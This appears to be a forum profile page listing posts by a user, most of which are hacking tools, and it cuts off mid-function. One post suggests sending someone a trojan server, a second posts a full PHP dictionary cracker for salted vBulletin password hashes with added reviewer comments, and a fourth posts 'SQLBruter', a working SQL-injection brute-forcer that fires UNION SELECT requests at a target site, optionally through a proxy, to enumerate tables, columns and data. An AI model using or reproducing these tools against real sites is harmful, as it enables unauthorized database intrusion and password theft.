
Ras


Everything posted by Ras

  1. incearca si trimite-i un server de trojan care sa nu ii afecteze systemul... si distreaza-te cu el..
  2. ############################################################
     ## Author:         M4k3                                   ##
     ## Script-Version: 1.0.2b                                 ##
     ## Script-Name:    vb_tool.php                            ##
     ## Copyright:      pldsecurity.de / .com /pldsoft.com     ##
     ##                                                        ##
     ## Comment: Next Version coming soon, check               ##
     ##          pldsecurity.com for Updates                   ##
     ############################################################
     # For Crack Option, you need: [vbulletin database] & [wordlist]
     # For Find Option, you need: [vbulletin database]
     #
     # Reviewer summary (what the listing does):
     #   - Connects to a MySQL server that already holds a copy of a vBulletin
     #     database and reads the `user` table (userid, username, salt, password).
     #   - "Crack" option: for one username, hashes each line of a local wordlist
     #     as md5(md5(word) . salt) and compares it with the stored password value.
     #   - "Find" option: hashes one submitted password the same way and compares
     #     it with every row of the table.
     #   Nothing here talks to a live forum; it only works on a database copy.
     #
     # Defender takeaways:
     #   - The whole comparison is two plain MD5 passes, so guesses against this
     #     hash format are cheap once the user table is exposed. A leaked dump or
     #     backup of the user table should be handled as a credential compromise
     #     (forced resets, session invalidation), and stored passwords should use
     #     a slow, purpose-built password hashing function instead.
     #   - Artefacts visible in this listing that can be used when sweeping a web
     #     root: the banner's script name `vb_tool.php` and the page title
     #     "VBulletin Password Cracker".
     #
     # NOTE(review): the forum software appears to have altered the listing --
     # `[/page]` inside `$mysql[/page][page]` and the `[b]`/`[/b]` tags inside the
     # HTML strings look like BBCode residue, not original source. The code below
     # is reproduced as printed on the page.
     ###################### Set Error Reporting #################
     # Notices are masked; the array keys below are written as bare words.
     error_reporting(E_ALL & ~E_NOTICE);
     set_time_limit(60);
     # 60 for a database with 1000 Users
     # 180 for a database with 3000 Users
     ####################### Change Values ######################
     #MySQL Values
     # Defaults as shipped: local server, `root` account, empty password.
     $mysql[server] = 'localhost:3306';
     $mysql[username] = 'root';
     $mysql[password] = '';
     $mysql[database] = 'vbulletin';
     $mysql[table] = 'user';
     $mysql[/page][page] = '20'; # Show 20 User / Site on User list
     #Script Values
     $script[wordlist] = 'word.txt';
     # Without a readable wordlist file the "crack" checkbox is rendered disabled.
     if(!file_exists($script[wordlist])) { $script[crack_option] = false; }
     $script[version] = '1.0.2b';
     #############################################################
     ###################### Connection ###########################
     # Both calls abort the page with the raw MySQL error text on failure.
     $mysql[connect] = mysql_connect($mysql[server], $mysql[username], $mysql[password]) or die ("MySQL-Error: " .mysql_error());
     $mysql[connect_db] = mysql_select_db($mysql[database], $mysql[connect]) or die ("MySQL-Error: " . mysql_error());
     #############################################################

     # check_table(): runs a full select on the configured table and returns 1
     # when no MySQL error is reported; a failed query ends the script via die().
     function check_table() {
         global $mysql;
         $query = mysql_query("Select * from ".$mysql[table]."") or die ("MySQL-Error: " . mysql_error());
         if(!mysql_error()) { return 1; }
     }

     # find_password(): takes the submitted form array (parameter is literally
     # named $_POST) and reports every row whose stored hash matches the
     # submitted password.
     function find_password($_POST) {
         global $mysql;
         # First pass: collect every salt in the table into one delimited string,
         # then split it back into an array.
         $query = mysql_query("Select * from ".$mysql[table]."") or die ("MySQL-Error: " . mysql_error());
         while($user = mysql_fetch_array($query)) { $script[get_salt] .= $user[salt].htmlentities('<r>'); }
         $script[salt] = explode(htmlentities('<r>'), $script[get_salt]);
         # Second pass: for each user row, try the candidate with every collected
         # salt (rows x salts comparisons, which is why the time limit above is
         # scaled to the number of users).
         $query = mysql_query("Select * from ".$mysql[table]."") or die ("MySQL-Error: " . mysql_error());
         while($user = mysql_fetch_array($query)) {
             for($i=0;$i<=sizeof($script[salt]);$i++) {
                 # Hash form compared against the stored value: md5(md5(password) . salt)
                 if(md5(md5(rtrim($_POST['password'])).$script[salt][$i]) == $user[password]) {
                     print 'Password found! Username: '.$user[username].' Userid: '.$user[userid].' ';
                     flush();
                 }
             }
         }
     }

     # crack_password(): looks up one user by the submitted username and tests
     # each wordlist line against that user's salt and stored hash.
     function crack_password($_POST) {
         global $script;
         global $mysql;
         # The username is placed into the SQL text after addslashes() only.
         $query = mysql_query("Select * from ".$mysql[table]." where username = '".addslashes($_POST['username'])."'") or die ("MySQL-Error: " . mysql_error());
         $user = mysql_fetch_array($query);
         if(!is_array($user)) {
             print 'The User with the name [b]'.addslashes($_POST['username']).'[/b] doesn\'t exist. <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>';
         } else {
             $file = fopen($script[wordlist], 'r');
             while(!feof($file)) {
                 $word = fgets($file, 4096);
                 # Same hash form as in find_password(), with this user's salt.
                 if(md5(md5(rtrim($word)).$user[salt]) == $user[password]) {
                     print 'Password Cracked! 
Password is [b]'.$word.'[/b]';
                     $cracked = true;
                 }
             }
             if($cracked == false) { print 'Failed to Crack Password.'; }
             fclose($file);
         }
     }

     # Page controller: everything below only renders when the table is readable.
     # Request values and database values are written into the HTML without
     # output escaping throughout this section.
     if(check_table() == 1) {
         print '<html> <head> <title>VBulletin Password Cracker</title> <style type = "text/css"> body { font-size: 11px; text-align: center; } .option_table { font-size: 11px; border: 1px #000000 solid; width: 300px; } .main_table { font-size: 11px; border: 1px #000000 solid; width: 350px; } .user_table { font-size: 11px; text-align: center; border: 0px #000000 solid; } .show_user { border: 1px #000000 solid; width: 125px; } .input_text { font-size: 11px; } .input_submit { color: #ffffff; font-size: 11px; border: 1px #000000 solid; background-color: #000000; } a:link { color: #000000; text-decoration: none; } a:hover { color: #000000; text-decoration: underline overline; } </style> </head> <body>';
         # Index view: neither option selected yet, show the two checkboxes.
         if(empty($_GET['crack_option']) && empty($_GET['find_option'])) {
             print '<form method = "get"> <table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "option_table"> <tr> <td colspan = "2" align = "center"> [b]vbulletin password cracker & finder '.$script[version].'[/b] <hr size = "1" style = "border: 1px #000000 solid;" </td> </tr> <tr> <td>';
             if($script[crack_option] !== false) { print '<input type = "checkbox" name = "crack_option">'; } else { print '<input type = "checkbox" name = "crack_option" disabled>'; }
             print '</td> <td> Use "Crack Password" Option </td> </tr> <tr> <td> <input type = "checkbox" name = "find_option"> </td> <td> Use "Find Password" Option </td> </tr> <tr> <td colspan = "2" align = "center"> <hr size = "1" style = "border: 1px #000000 solid;" <input type = "submit" value = "Run Option" class = "input_submit"> </td> </tr> <tr> <td colspan = "2" align = "center"> © Copyright by M4k3 <a href = "http://pldsecurity.com">PLDsecurity.com</a> </td> </tr> </table> </form>';
         }
         if($_GET['crack_option'] == 'on') {
             # Paged list of userid/username pairs taken from the table.
             if($_GET['do'] == 'show_user') {
                 print '<table border = "0" cellspacing = 
"0" cellpadding = "5" align = "center" class = "user_table"> <tr> <td colspan = "2" class = "show_user"> Please select a username. </td> </tr> <tr> <td class = "show_user"> Userid </td> <td class = "show_user"> Username </td> </tr>';
                 # First page: fixed offset 0 and the configured page size.
                 if(empty($_GET['start']) && empty($_GET['end'])) {
                     $query = mysql_query("Select userid, username from ".$mysql[table]." limit 0, ".$mysql[/page][page]."") or die ("MySQL-Error: " . mysql_error());
                     while($show_user = mysql_fetch_array($query)) {
                         print '<tr> <td class = "show_user"> '.$show_user[userid].' </td> <td class = "show_user"> <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=get_user&username='.$show_user[username].'"> '.$show_user[username].'</a> </td> </tr>';
                     }
                     print '<tr> <td colspan = "2" align = "right" class = "show_user"> <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$mysql[/page][page].'&end='.$mysql[/page][page].'"> Next Page >></a> </td> </tr> </table> ';
                     print '<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>';
                 } else {
                     # Later pages: `start` and `end` from the query string go into
                     # the LIMIT clause after addslashes() only; they are not
                     # checked to be integers.
                     $query = mysql_query("Select userid, username from ".$mysql[table]." limit ".addslashes($_GET['start']).",".addslashes($_GET['end'])."") or die ("MySQL-Error: " . mysql_error());
                     while($show_user = mysql_fetch_array($query)) {
                         print '<tr> <td class = "show_user"> '.$show_user[userid].' </td> <td class = "show_user"> <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=get_user&username='.$show_user[username].'"> '.$show_user[username].'</a> </td> </tr>';
                     }
                     $page[next] = $_GET['start'] + $mysql[/page][page];
                     $page[previous] = $_GET['start'] - $mysql[/page][page];
                     # The row count query names the table `user` directly rather
                     # than using the configured table name.
                     $query = mysql_query("Select count(*) from user") or die ("MySQL-Error: " . mysql_error());
                     $mysql[table_count] = mysql_fetch_array($query);
                     # Choose which of the previous/next links to render.
                     if($page[previous] < 0) {
                         print '<tr> <td colspan = "2" align = "right" class = "show_user"> <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[next].'&end='.$mysql[/page][page].'"> Next Page >></a> </td> </tr> </table> ';
                     } elseif($page[next] > $mysql[table_count][0]) {
                         print '<tr> <td colspan = "2" align = "left" class = "show_user"> <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[previous].'&end='.$mysql[/page][page].'"> << Previous Page</a> </td> </tr> </table> ';
                     } else {
                         print '<tr> <td align = "left" class = "show_user"> <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[previous].'&end='.$mysql[/page][page].'"> << Previous Page</a> </td> <td align = "right" class = "show_user"> <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[next].'&end='.$mysql[/page][page].'"> Next Page >></a> </td> </tr> </table> ';
                     }
                     print '<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>';
                 }
             } elseif($_GET['do'] == 'crack_password' && !empty($_POST['username'])) {
                 crack_password($_POST);
             } else {
                 # Username entry form; when reached through a user-list link the
                 # `username` query parameter is copied into the value attribute
                 # as-is.
                 print '<form action = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=crack_password" method = "post"> <table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "main_table"> <tr> <td colspan = "2" align = "center"> Insert a username or use the function "show user list" <hr size = "1" style = "border: 1px #000000 solid;"> </td> </tr> <tr> <td> Username: </td> <td>';
                 if($_GET['do'] == 'get_user' && !empty($_GET['username'])) { print '<input type = "text" name = "username" value = "'.$_GET['username'].'" size = "30" class = "input_text">'; } else { print '<input type = "text" name = "username" size = "30" class = "input_text">'; }
                 print '</td> </tr> <tr> <td colspan = "2" align = "center"> <input type = "submit" value = "Crack Password" class = "input_submit"> </td> </tr> <tr> <td 
colspan = "2" align = "center"> <hr size = "1" style = "border: 1px #000000 solid;"> <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user">show user list</a> </td> </tr> </table> </form> <a href = "'.$_SERVER[PHP_SELF].'">Back to Script Index</a>';
             }
         } elseif($_GET['find_option'] == 'on') {
             # "Find" option: either run the search or show the password form.
             if($_GET['do'] == 'find_password' && !empty($_POST['password'])) {
                 print 'Searching... ';
                 flush();
                 find_password($_POST);
             } else {
                 print '<form action = "'.$_SERVER[PHP_SELF].'?find_option=on&do=find_password" method = "post"> <table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "main_table"> <tr> <td colspan = "2" align = "center"> Please insert a password. <hr size = "1" style = "border: 1px #000000 solid;"> </td> </tr> <tr> <td> Password: </td> <td> <input type = "text" name = "password" size = "30" class = "input_text"> </td> </tr> <tr> <td colspan = "2" align = "center"> <input type = "submit" value = "Find Password" class = "input_submit"> </td> </tr> </table> </form> <a href = "'.$_SERVER[PHP_SELF].'">Back to Script Index</a>';
             }
         }
         print ' </body> </html>';
     }
     ?><?
     # For Crack Option, you need: [vbulletin database] & [wordlist]
     # For Find Option, you need: [vbulletin database]
  3. Merci pt explicatie
  4. Ras

    SQL-Bruter v1.2

    <? ############################################### # SQLBruter v1.2 # # (c)oded by Raz0r # # ICQ 502210 # # Greets to InAttack # ############################################### error_reporting(7); set_magic_quotes_runtime(0); @set_time_limit(0); @ini_set("max_execution_time",0); @ini_set("output_buffering",0); @ini_set("default_socket_timeout",5); if (function_exists("ob_start")) ob_start('ob_tidyhandler'); $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\'; $self=basename($HTTP_SERVER_VARS['PHP_SELF']); echo "<html> <head><title>::SQLBruter 1.2 (coded by Raz0r)::</title> <style> Body { ; Font-Family: Arial; ; Font-size: 14px; } INPUT.speed { ; Font-Family: Arial; ; Font-size: 14px; ; Border-style: none; ; BackGround-color: transparent; } TABLE { ; Font-Family: Arial; ; Font-size: 14px; } TD.strconv { ; Font-Family: Verdana; ; Font-size: 4px; } DIV.copyright { ; Font-Family: Arial; ; Font-size: 12px; ; color: SILVER; } </style> </head>"; if ((!isset($_POST['submit'])) && (!isset($_GET['encode']))) { die (" <body onLoad=\"document.getElementById('1').style.display = 'none'; document.getElementById('2').style.display = 'none'; document.getElementById('3').style.display = 'none'; document.getElementById('4').style.display = 'none';\"> <Font Face=\"arial\"> <Center> <H1><Font color=#DDDDDD>SQLBruter 1.2</font></H1> <Form Method=\"Post\"> <Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD> <Tr> <Td> <Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef> <Tr> <Td> <table><tr><td width=100>URL</td> <td><Input Type=\"text\" Name=\"url_post\" Value=\"http://\" SIZE=40></td></table> <table><tr><td width=100>String</td> <td><Input Type=\"text\" Name=\"string_post\" SIZE=40></td></table> <table><tr><td width=100>log file</td> <td><Input Type=\"text\" Name=\"log_post\" Value=\"log.txt\" SIZE=40></td></table> <table><tr><td width=100>proxy</td><td><Input Type=\"text\" Name=\"proxy_post\" SIZE=40></td></table> <table><tr><td valign=top 
width=100>mode</td><td> <Input Type=\"radio\" Name=\"mode_post\" Value=\"1\" onClick=\"document.getElementById('1').style.display = 'block'; document.getElementById('2').style.display = 'none'; document.getElementById('3').style.display = 'none'; document.getElementById('4').style.display = 'none';\">Number of selected rows bruteforce <Input Type=\"radio\" Name=\"mode_post\" Value=\"2\" onClick=\"document.getElementById('1').style.display = 'none'; document.getElementById('2').style.display = 'block'; document.getElementById('3').style.display = 'none'; document.getElementById('4').style.display = 'none';\">Names of tables bruteforce <Input Type=\"radio\" Name=\"mode_post\" Value=\"3\" onClick=\"document.getElementById('1').style.display = 'none'; document.getElementById('2').style.display = 'none'; document.getElementById('3').style.display = 'block'; document.getElementById('4').style.display = 'none';\">Names of columns bruteforce <Input Type=\"radio\" Name=\"mode_post\" Value=\"4\" onClick=\"document.getElementById('1').style.display = 'none'; document.getElementById('2').style.display = 'none'; document.getElementById('3').style.display = 'none'; document.getElementById('4').style.display = 'block';\">Character-oriented bruteforce</td></table> <div id=\"1\"><table><tr><td width=200>max number of rows to brute</td> <td valign=top> <Input Type=\"text\" Name=\"max_post\" Value=\"20\" SIZE=2></td></table> <table><tr><td width=200>get columns which can output information</td> <td valign=top> <Input Type=\"checkbox\" Name=\"getcols_post\" checked></td></table></div> <div id=\"2\"><table><tr><td width=200>number of the selected rows</td> <td valign=top> <Input Type=\"text\" Name=\"rows1_post\" Value=\"15\" SIZE=2></td></table><table><tr><td width=200>path to the dictionary file</td><td> <Input Type=\"text\" Name=\"dic1_post\" Value=\"dic.txt\" SIZE=20></td></tr><table><tr><td width=200>prefix</td><td> <Input Type=\"text\" Name=\"pref_post\" 
SIZE=20></td></tr></table></div> <div id=\"3\"><table><tr><td width=200>number of the selected rows</td> <td valign=top> <Input Type=\"text\" Name=\"rows2_post\" Value=\"15\" SIZE=2></td></table><table><tr><td width=200>path to the dictionary file</td><td> <Input Type=\"text\" Name=\"dic2_post\" Value=\"dic.txt\" SIZE=20></td></tr><table><tr><td width=200>name of the table to brute</td><td> <Input Type=\"text\" Name=\"table_post\" SIZE=20></td></tr></table></div> <div id=\"4\"><table title=\"e.g. user(), version(), etc\"><tr><td width=200>DB query</td> <td valign=top> <Input Type=\"text\" Name=\"query_post\" Value=\"user()\" SIZE=20></td></table><table><tr><td width=200>use specific range of chars</td><td> <Input Type=\"text\" Name=\"ot_post\" Value=\"97\" SIZE=3><Input Type=\"text\" Name=\"do_post\" Value=\"122\" SIZE=3></td></tr></table></div> </Td> </Tr> </Table> </Td> </Tr> </Table> <A Href=\"$self?encode\">String converter</A> <Input Type=\"submit\" Value=\"GO!\" name=\"submit\"> <Div class=copyright>[B]Raz0r[/B] 2007 ©</Div></Center> </body> </html>" ); } elseif (isset($_GET['encode'])) { $strconv = $_POST['strconv_post']; $len = strlen($strconv); echo "<body> <Center> <H1><Font color=#DDDDDD>SQLBruter 1.2</font></H1> <Form Method=\"Post\"> <Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=90%> <Tr> <Td> <Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%> <Tr> <Td> <table><tr><td width=100%> <Input Type=\"text\" Name=\"strconv_post\" Value=\"";if (!empty($strconv))echo $strconv; else echo "enter text here"; echo "\"> <Input Type=\"submit\" name=\"submit_encode\" Value=\"Encode\"> </td></tr></table>"; for ($i = 0; $i < $len; $i++) { $substring = substr($strconv,$i,1); $ascii_code = ord($substring); if ($i == ($len - 1)) $res .= $ascii_code; else $res .= $ascii_code.","; } if (($len > 0) && (isset($_POST['submit_encode']))) $ascii = "CHAR(".$res.")"; else $ascii = null; if (($len > 0) && (isset($_POST['submit_encode']))) $hex = 
"0x".bin2hex($strconv); else $hex = null; if(isset($_POST['submit_encode'])) $base64 = base64_encode($strconv); if(isset($_POST['submit_encode']))$md5= md5($strconv); if(isset($_POST['submit_encode']))$sha1 = sha1($strconv); echo "<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=90%> <Tr> <Td> <Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%> <Tr><Td> <table><tr><td width=200>ASCII (SQL syntax)</td> <td><TextArea Name=result1 Cols=\"100\" Rows=\"2\">$ascii</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result1.select();result1.focus()></Td></table> <table><tr><td width=200>HEX</td> <td><TextArea Name=result2 Cols=\"100\" Rows=\"2\">$hex</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result2.select();result2.focus()></Td></table> <table><tr><td width=200>BASE64</td> <td><TextArea Name=result3 Cols=\"100\" Rows=\"2\">$base64</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result3.select();result3.focus()></Td></table> <table><tr><td width=200>MD5</td> <td><TextArea Name=result4 Cols=\"100\" Rows=\"2\">$md5</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result4.select();result4.focus()></Td></table> <table><tr><td width=200>SHA1</td> <td><TextArea Name=result5 Cols=\"100\" Rows=\"2\">$sha1</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result5.select();result5.focus()></Td></table> </Td> </Td> </Tr> </Table> </Td> </Tr> </Table></Td> </Tr> </Table></Td> </Tr> </Table><Div class=copyright> [B]Raz0r[/B] 2007 ©</Div></Center></body></html>"; die; } if (!empty($_POST['url_post'])) $url = $_POST['url_post']; else die("NO URL"); if (!empty($_POST['string_post'])) $string = $_POST['string_post']; else die("NO STRING"); if (!empty($_POST['mode_post'])) $mode = $_POST['mode_post']; else die("NO MODE"); if (!empty($_POST['log_post'])) $log = $_POST['log_post']; if 
(!empty($_POST['proxy_post']))$proxy = $_POST['proxy_post']; $c = preg_match($proxy_regex,$proxy); if (!$c) die("NOT A VALID PROXY"); $conn = @parse_url($url); $host = $conn["host"]; $path = $conn["path"]; $param = $conn["query"]; if (isset($conn["port"])) $port = $conn["port"]; else $port=80; switch ($mode) { case 1: if (!empty($_POST['max_post'])) $max = $_POST['max_post']; else die("NO MAX NUMBER OF ROWS"); if (!empty($_POST['getcols_post'])) $getcols = $_POST['getcols_post']; if ($getcols == "on") $getcols = 1; else $getcols = 0; show_params(); mode1($url, $string, $max, $getcols); break; case 2: if (!empty($_POST['rows1_post'])) $rows = $_POST['rows1_post']; else die("NO ROWS"); if (!empty($_POST['dic1_post'])) $dic = $_POST['dic1_post']; else die("NO DICTIONARY"); if (!empty($_POST['pref_post'])) $pref = $_POST['pref_post']; show_params(); brute($url, $string, $rows, $dic, FALSE); break; case 3: if (!empty($_POST['rows2_post'])) $rows = $_POST['rows2_post']; else die("NO ROWS"); if (!empty($_POST['dic2_post'])) $dic = $_POST['dic2_post']; else die("NO DICTIONARY"); if (!empty($_POST['table_post'])) $table = $_POST['table_post']; else die("NO TABLE"); show_params(); brute($url, $string, $rows, $dic, $table); break; case 4: if (!empty($_POST['query_post'])) $query = $_POST['query_post']; else die("NO QUERY"); if (!empty($_POST['ot_post'])) $ot = $_POST['ot_post']; else $ot = 97; if (!empty($_POST['do_post'])) $do = $_POST['do_post']; else $do = 122; show_params(); mode4($url, $string, $query, $ot, $do); break; } function mode_name($mode) { $modes = array("Number of selected rows bruteforce", "Names of tables bruteforce", "Names of columns bruteforce", "Character-oriented bruteforce"); return $modes[$mode-1]; } function show_params() { global $url, $string, $mode, $log, $proxy, $max, $rows, $dic, $pref, $table, $query, $ot, $do; $mode_name = mode_name($mode); echo " <body> <script> <!-- var ie=document.all?1:0; var ns=document.getElementById&&!document.all?1:0; 
function InsertText(text) { if(ie) { document.all.text.value=text; } else if(ns) { document.forms['speed'].elements['text'].value=text; } else alert(\"Your browser is NOT supported\"); } --> </script> <Font Face=\"arial\"> <Center> <H1><Font color=#DDDDDD>SQLBruter 1.2</font></H1> <Table CellSpacing=\"0\" CellPadding=\"0\" width=90%> <Tr> <Td> <Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%> <Tr> <Td> <Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%> <Tr> <Td> <table><tr><td width=150>[B]URL[/B]</td> <td>".htmlspecialchars($url)."</td></table> <table><tr><td width=150>[B]String[/B]</td> <td>".htmlspecialchars($string)."</td></table> <table><tr><td width=150>[B]Mode[/B]</td><td>".htmlspecialchars($mode_name)."</td></table> "; if (isset($log)) echo "<table><tr><td width=150>[B]Log file[/B]</td> <td>".htmlspecialchars($log)."</td></table>"; if (isset($proxy)) echo "<table><tr><td width=150>[B]Proxy[/B]</td> <td>".htmlspecialchars($proxy)."</td></table>"; switch ($mode) { case 1: echo "<table><tr><td width=150>[B]Rows max number[/B]</td> <td>".htmlspecialchars($max)."</td></table>"; break; case 2: echo "<table><tr><td width=150>[B]Number of the selected rows[/B]</td> <td>".htmlspecialchars($rows)."</td></table>"; echo "<table><tr><td width=150>[B]Dictionary[/B]</td> <td>".htmlspecialchars($dic)." (".checkdic($dic)." words)</td></table>"; if (isset($pref)) echo "<table><tr><td width=150>[B]Prefix[/B]</td> <td>".htmlspecialchars($pref)."</td></table>"; break; case 3: echo "<table><tr><td width=150>[B]Number of the selected rows[/B]</td> <td>".htmlspecialchars($rows)."</td></table>"; echo "<table><tr><td width=150>[B]Dictionary[/B]</td> <td>".htmlspecialchars($dic)." (".checkdic($dic)." 
words)</td></table>"; echo "<table><tr><td width=150>[B]Table[/B]</td> <td>".htmlspecialchars($table)."</td></table>"; break; case 4: echo "<table><tr><td width=150>[B]Query[/B]</td> <td>".htmlspecialchars($query)."</td></table>"; echo "<table><tr><td width=150>[B]From[/B]</td> <td>".htmlspecialchars($ot)."</td></table>"; echo "<table><tr><td width=150>[B]To[/B]</td> <td>".htmlspecialchars($do)."</td></table>"; break; } echo "</Td></Tr></Table></Td></Tr></Table> "; flush(); } function sendpacket($packet) { global $host, $port, $proxy; if (empty($proxy)) { $ock = @fsockopen(@gethostbyname($host),$port); stream_set_blocking($ock, 0); stream_set_timeout($ock,600); if (!$ock) { echo "No response from ".$host.":80 "; } else { fputs($ock, $packet); $html=""; while (!feof($ock)) { $html.=fgets($ock); } } } else { $parts=explode(":",$proxy); $ock2=@fsockopen($parts[0],$parts[1]); if (!$ock2) { echo "No response from proxy ($proxy)"; } else { fputs($ock2,$packet); $html=""; while ((!feof($ock2)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock2,1); } } } return $html; } function savelogfile($logfile, $mode, $text) { if (!is_file($logfile)) { $s = @fopen($logfile,"w"); fclose($s); chmod($logfile,0777); } $fp = @fopen($logfile,"a"); fputs($fp, "*** SQLBruter's report [".date(" l dS 0f F Y h:i:s A ")."] ***\r\n"); fputs($fp, "[~] ".mode_name($mode)."\r\n".$text."\r\n"); fputs($fp, "____________________________________________________________________\r\n"); fclose($fp); } function checkdic($dic) { $handle = @fopen($dic, "r"); if ($handle) { while (!feof($handle)) { $buffer = fgets($handle, 4096); $x++; } fclose($handle); } else die("INVALID DICTIONARY"); return $x; } function mode1($url, $string, $max, $getcols) { global $log, $proxy, $host, $path, $param; echo "<Form name=\"speed\"><Input Type=\"text\" Name=\"text\" Value=\"Please wait...\" size=100 class=speed DISABLED=yes></Form>"; flush(); for ($i = 0; $i < $max; $i++) { if ($i > 0) $null 
.=",0"; else $null = "0"; $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null."/* HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $content = sendpacket($packet); if (strpos($content, $string)>0) { if ($getcols == 1) { for ($z = 1; $z <= ($i+1); $z++) { if ($z > 1) $razor .=",0x72617a3072".bin2hex($z); else $razor = "0x72617a3072".bin2hex($z); } $temp = explode("=", $param); $temp[(sizeof($temp)-1)] = "-1"; $param = implode("=", $temp); $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$razor."/* HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $content = sendpacket($packet); for ($y = 1; $y <= ($i+1); $y++) { if (strpos($content, ("raz0r".$y)) > 0) $visiblecols[] .= $y; } if (!is_array($visiblecols)) {$nocols = 1;} } echo "<script>InsertText('Done!');</script>"; echo "<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%><Tr><Td><Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%><Tr><Td>Number of rows is ".($i+1)." "; if (($getcols == 1) && ($nocols != 1)) {$result = $url." UNION SELECT ".$null."/* Columns ".@implode(",", $visiblecols)." can output information";} elseif ($nocols == 1) $result = $url." UNION SELECT ".$null."/* No columns which can output information"; else $result = $url." UNION SELECT ".$null."/*"; echo $result; echo "</Td></Tr></Table></Td></Tr></Table></Td></Tr></Table></body></html>"; flush(); if (isset($log)) {$result = str_replace(" ", "\r\n", $result); savelogfile($log, 1, $result);} die; } } echo "<script>InsertText('Failed! 
Try to increase max number of selected rows');</script>"; flush(); } function brute($url, $string, $rows, $dic, $table) { global $log, $proxy, $pref, $host, $path, $param; $x = checkdic($dic); echo "<Form name=\"speed\"><Input Type=\"text\" Name=\"text\" Value=\"\" size=100 class=speed DISABLED=yes></Form>"; flush(); $handle = @fopen($dic, "r"); if ($handle) { $begin_time = time(); if ($table === FALSE) { for ($i = 0; $i < $rows; $i++) { if ($i > 0) $null .=",0"; else $null = "0"; } } else { for ($i = 0; $i < ($rows-1); $i++) { if ($i > 0) $null .=",0"; else $null = "0"; } } for ($i = 0; $i < $x; $i++) { $word = fgets($handle, 4096); $word = ereg_replace("\n", "", $word); $word = ereg_replace("\r", "", $word); $word = trim($word); if (isset($pref)) $word = $pref."_".$word; if (($word !== "") & (!is_numeric($word)) & (!strpos($word,"-")) & (!strpos($word, " "))) { if ($table === FALSE) $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null."%20FROM%20".urlencode($word)."/* HTTP/1.1\r\n"; else $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null.",".urlencode($word)."%20FROM%20".$table."/* HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $content = sendpacket($packet); $z++; $r++; if ($begin_time + 1 == time()) { $begin_time += 1; $percent = round($z/$x * 100); $words_per_second = $r; $r = 0; echo "<script>InsertText('Completed - ".$percent."%\tCurrent speed - ".$words_per_second." words per second');</script>"; flush(); } elseif ($begin_time + 1 < time()) { $begin_time = time() + 1; $percent = round($z/$x * 100); $words_per_second = $r; $r = 0; echo "<script>InsertText('Completed - ".$percent."%\tCurrent speed - ".$words_per_second." words per second');</script>"; flush(); } if (strpos($content, $string)>0) { if ($table === FALSE) { $result = $url." UNION SELECT ".$null." 
FROM ".$word."/*"; echo "<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%><Tr><Td><Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%><Tr><Td>Table was found - $word $result</Td></Tr></Table></Td></Tr></Table> "; } else { $result = $url." UNION SELECT ".$null.",".$word." FROM ".$table."/*"; echo "<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%><Tr><Td><Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%><Tr><Td>Column was found - $word $result</Td></Tr></Table></Td></Tr></Table> "; } flush(); if (isset($log)) { if ($table === FALSE) savelogfile($log, 2, $result); else savelogfile($log, 3, $result); } } } } } } function found($min, $max, $sp, $result) { if (($max-$min)<5) crack($min,$max, $sp, $result); $r = round($max - ($max-$min)/2); $check = ">$r"; if ( check($check, $sp, $result)) { if (!empty($result)) $status = "(".$result.")"; print "<script>InsertText('Now checking > $r $status');</script>"; flush(); found($r,$max, $sp, $result); } else { if (!empty($result)) $status = "(".$result.")"; print "<script>InsertText('Now checking < $r $status');</script>"; flush(); found($min,$r+1, $sp, $result); } } function crack($cmin, $cmax, $sp, $result) { global $ot, $do, $output, $query; $i = $cmin; $check1 = ">0"; if (check($check1, 